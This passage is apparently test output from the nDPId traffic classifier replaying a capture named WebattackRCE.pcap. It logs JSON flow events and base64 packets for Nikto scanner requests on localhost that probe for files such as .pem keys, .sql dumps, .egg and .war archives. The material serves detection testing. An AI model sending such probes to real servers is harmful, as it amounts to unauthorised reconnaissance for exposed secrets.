+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277116,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":1576420277118,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277118,"pkt":"AAAAAAAAAAAAAAAACABFAADBWpRAAEAG4aB\/AAABfwAAAcO+H5A50mLuGW1voYAYAED+tQAAAQEICp1m\/KadZvymR0VUIC8xMjcwMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277119,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":1,"flow_last_seen":1576420277119,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277119,"pkt":"AAAAAAAAAAAAAAAACABFAADBojBAAEAGmgR\/AAABfwAAAcPAH5CoeZpSE7JOEoAYAED+tQAAAQEICp1m\/KedZvynR0VUIC8xMjcwMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277119,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277119,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277121,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":1576420277121,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277121,"pkt":"AAAAAAAAAAAAAAAACABFAADB1+ZAAEAGZE5\/AAABfwAAAcPCH5Dv1e9lqA5LqYAYAED+tQAAAQEICp1m\/KidZvyoR0VUIC8xMjcwMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277121,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277121,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277122,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":1576420277122,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277122,"pkt":"AAAAAAAAAAAAAAAACABFAADBr9xAAEAGjFh\/AAABfwAAAcPEH5A9f5dbU\/lctoAYAED+tQAAAQEICp1m\/KqdZvyqR0VUIC8xMjcwMC5zcWwgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277122,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277122,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277123,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":1576420277123,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277123,"pkt":"AAAAAAAAAAAAAAAACABFAADAYAxAAEAG3Cl\/AAABfwAAAcPGH5DSd1iLatlmxYAYAED+tAAAAQEICp1m\/KudZvyrR0VUIC9zaXRlLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277123,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277123,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277126,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":1,"flow_last_seen":1576420277126,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277126,"pkt":"AAAAAAAAAAAAAAAACABFAADA98ZAAEAGRG9\/AAABfwAAAcPIH5D1l89GxMECdIAYAED+tAAAAQEICp1m\/K6dZvytR0VUIC9zaXRlLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277126,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277126,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277127,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1576420277127,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277127,"pkt":"AAAAAAAAAAAAAAAACABFAADBPaVAAEAG\/o9\/AAABfwAAAcPKH5CdTAUjrG8+WIAYAED+tQAAAQEICp1m\/K+dZvyvR0VUIC8xMjcuMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277127,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277127,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277128,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":1576420277128,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277128,"pkt":"AAAAAAAAAAAAAAAACABFAADBZB5AAEAG2BZ\/AAABfwAAAcPMH5CtKVyfkMJlVIAYAED+tQAAAQEICp1m\/LCdZvywR0VUIC8xMjcuMC53YXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 